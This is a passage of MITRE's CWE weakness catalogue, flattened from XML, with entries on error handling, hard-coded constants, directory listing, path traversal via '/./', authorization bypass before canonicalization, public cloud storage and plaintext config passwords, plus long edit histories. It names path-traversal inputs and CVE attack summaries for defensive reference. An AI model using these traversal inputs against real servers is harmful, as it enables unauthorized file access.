updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Use of Singleton Pattern in a Non-thread-safe Manner + + + + The product does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses. + If the product handles error messages individually, on a one-by-one basis, this is likely to result in inconsistent error handling. The causes of errors may be lost. Also, detailed information about the causes of an error may be unintentionally returned to the user. + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Integrity + Other + Quality Degradation + Unexpected State + Varies by Context + + + + + Architecture and Design + define a strategy for handling errors of different severities, such as fatal errors versus basic log events. Use or create built-in language features, or an external package, that provides an easy-to-use API and define coding standards for the detection and handling of errors. + + + + + ERR00-C + Adopt and implement a consistent and comprehensive error-handling policy + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-12-13 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Missing Error Handling Mechanism + Failure to Use a Standardized Error Handling Mechanism + + + + This weakness has been deprecated because it partially overlaps CWE-470, it describes legitimate programmer behavior, and other portions will need to be integrated into other entries. + + Prohibited + This CWE has been deprecated. + See description and name for possible suggestions of other CWEs to consider. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Dynamic Class Loading + Use of Dynamic Class Loading + + + + The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses. + Many suspicious comments, such as BUG, HACK, FIXME, LATER, LATER2, TODO, in the code indicate missing security functionality and checking. Others indicate code problems that programmers should fix, such as hard-coded variables, error handling, not using stored procedures, and performance issues. + + + + + + Indirect + + + + + + + + Implementation + + + + + Other + Quality Degradation + Suspicious comments could be an indication that there are problems in the source code that may need to be fixed and is an indication of poor quality. This could lead to further bugs and the introduction of weaknesses. + + + + + Documentation + Remove comments that suggest the presence of bugs, incomplete functionality, or weaknesses, before deploying the application. + + + + + The following excerpt demonstrates the use of a suspicious comment in an incomplete code block that may have security repercussions. + + if (user == null) { + + + // TODO: Handle null user condition. + + + } + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-06-21 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change. + If the developer does not find all occurrences of the hard-coded constants, an incorrect policy decision may be made if one of the constants is not changed. Making changes to these values will require code changes that may be difficult or impossible once the system is released to the field. In addition, these hard-coded values may become available to attackers if the code is ever disclosed. + + + + + + Indirect + + + + + Implementation + + + + + Other + Varies by Context + Quality Degradation + The existence of hardcoded constants could cause unexpected behavior and the introduction of weaknesses during code maintenance or when making changes to the code if all occurrences are not modified. The use of hardcoded constants is an indication of poor quality. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Avoid using hard-coded constants. Configuration files offer a more flexible solution. + + + + + The usage of symbolic names instead of hard-coded constants is preferred. + The following is an example of using a hard-coded constant instead of a symbolic name. + + char buffer[1024];...fgets(buffer, 1024, stdin); + + If the buffer value needs to be changed, then it has to be altered in more than one place. If the developer forgets or does not find all occurrences, in this example it could lead to a buffer overflow. + + enum { MAX_BUFFER_SIZE = 1024 };...char buffer[MAX_BUFFER_SIZE];...fgets(buffer, MAX_BUFFER_SIZE, stdin); + + In this example the developer will only need to change one value and all references to the buffer size are updated, as a symbolic name is used instead of a hard-coded constant. + + + + + DCL06-C + Use meaningful symbolic constants to represent literal values in program logic + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Potential_Mitigations, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Demonstrative_Examples, Mapping_Notes + + Security-relevant Constants + + + + A directory listing is inappropriately exposed, yielding potentially sensitive information to attackers. + A directory listing provides an attacker with the complete index of all the resources located inside of the directory. The specific risks and consequences vary depending on which files are listed and accessible. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Read Files or Directories + Exposing the contents of a directory can lead to an attacker gaining access to source code or providing useful information for the attacker to devise exploits, such as creation times of files or any information that may be encoded in file names. The directory listing may also compromise private or confidential data. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + System Configuration + Recommendations include restricting access to important directories or files by adopting a need to know requirement for both the document and server root, and turning off features such as Automatic Directory Listings that could expose private files and provide information that could be utilized by an attacker when formulating or conducting an attack. + + + + + A10 + Insecure Configuration Management + CWE More Specific + + + 16 + Directory Indexing + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Description + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Directory Listing + Information Exposure Through Directory Listing + + + + The product does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords. + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Requirements + Recommendations include requiring all password fields in your web application be masked to prevent other users from seeing this information. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Type + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts path input in the form of single dot directory exploit ('/./') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Implementation + Input Validation + Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. + + + + + CVE-2000-0004 + Server allows remote attackers to read source code for executable files by inserting a . (dot) into the URL. + https://www.cve.org/CVERecord?id=CVE-2000-0004 + + + CVE-2002-0304 + Server allows remote attackers to read password-protected files via a /./ in the HTTP request. + https://www.cve.org/CVERecord?id=CVE-2002-0304 + + + BID:6042 + Input Validation error + http://www.securityfocus.com/bid/6042 + + + CVE-1999-1083 + Possibly (could be a cleansing error) + https://www.cve.org/CVERecord?id=CVE-1999-1083 + + + CVE-2004-0815 + "/./////etc" cleansed to ".///etc" then "/etc" + https://www.cve.org/CVERecord?id=CVE-2004-0815 + + + CVE-2002-0112 + Server allows remote attackers to view password protected files via /./ in the URL. + https://www.cve.org/CVERecord?id=CVE-2002-0112 + + + + + /./ (single dot directory) + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Single Dot Directory - /./ + + + + Certain conditions, such as network failure, will cause a server error message to be displayed. + While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems. + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Confidentiality + Read Application Data + + + + + Architecture and Design + System Configuration + Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed. + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Name, Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Information Leak Through Server Error Message + Information Exposure Through Server Error Message + + + + If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection. + For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is performed. + + + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + URL Inputs should be decoded and canonicalized to the application's current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked. + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples, Description, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Authentication Before Parsing and Canonicalization + + + + The product makes files or directories accessible to unauthorized actors, even though they should not be. + + Web servers, FTP servers, and similar servers may store a set of files underneath a "root" directory that is accessible to the server's users. Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any. Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories. + In cloud technologies and containers, this weakness might present itself in the form of misconfigured storage accounts that can be read or written by a public or anonymous user. + + + + + + + + + + + + + + Architecture and Design + + + Implementation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Operation + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + System Configuration + Operation + When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access. + + + + + The following Azure command updates the settings for a storage account: + + az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access true + + However, "Allow Blob Public Access" is set to true, meaning that anonymous/public users can access blobs. + The command could be modified to disable "Allow Blob Public Access" by setting it to false. + + az storage account update --name <storage-account> --resource-group <resource-group> --allow-blob-public-access false + + + + The following Google Cloud Storage command gets the settings for a storage account named 'BUCKET_NAME': + + + gsutil iam get gs://BUCKET_NAME + + + Suppose the command returns the following result: + + { + + "bindings":[{ + + "members":[ + + "projectEditor: PROJECT-ID", + "projectOwner: PROJECT-ID" + + ], + "role":"roles/storage.legacyBucketOwner" + + }, + { + + "members":[ + + "allUsers", + "projectViewer: PROJECT-ID" + ], + "role":"roles/storage.legacyBucketReader" + + } + + ] + + } + + This result includes the "allUsers" or IAM role added as members, causing this policy configuration to allow public access to cloud storage resources. There would be a similar concern if "allAuthenticatedUsers" was present. + The command could be modified to remove "allUsers" and/or "allAuthenticatedUsers" as follows: + + gsutil iam ch -d allUsers gs://BUCKET_NAME + gsutil iam ch -d allAuthenticatedUsers gs://BUCKET_NAME + + + + + File or Directory + + + + A10 + Insecure Configuration Management + CWE More Specific + + + FIO15-C + Ensure that file operations are performed in a secure directory + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + Veracode + 2010-09-09 + Suggested OWASP Top Ten mapping + + + CWE Content Team + MITRE + 2010-09-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Errant Files or Directories Accessible + + + + A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server. + + + + + + Implementation + + + Operation + + + + + Confidentiality + Integrity + Availability + Execute Unauthorized Code or Commands + + + + + Installation + System Configuration + Remove any Shells accessible under the web root folder and children directories. + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Possible Command Shell (csh) + + + + The ASP.NET application does not use an input validation framework. + + + + + + Indirect + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Unexpected State + Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others. + + + + + Architecture and Design + + Use the ASP.NET validation framework to check all program input before it is processed by the application. Example uses of the validation framework include checking to ensure that: + + Phone number fields contain only valid characters in phone numbers + Boolean values are only "T" or "F" + Free-form strings are of a reasonable length and composition + + + + + + + SFP24 + Tainted input to command + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2009-07-27 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + ASP.NET Misconfiguration: Input Validation + + + + The J2EE application stores a plaintext password in a configuration file. + Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers. + + + + + + Architecture and Design + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Architecture and Design + Do not hardwire passwords into your software. + + + Architecture and Design + Use industry standard libraries to encrypt passwords before storage in configuration files. + + + + + Below is a snippet from a Java properties file in which the LDAP server password is stored in plaintext. + + webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Anonymous Tool Vendor (under NDA) + 2006-07-19 + Draft 3 + 2006-07-19 + + + Sean Eidemiller + Cigital + 2008-07-01 + added/updated demonstrative examples + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + 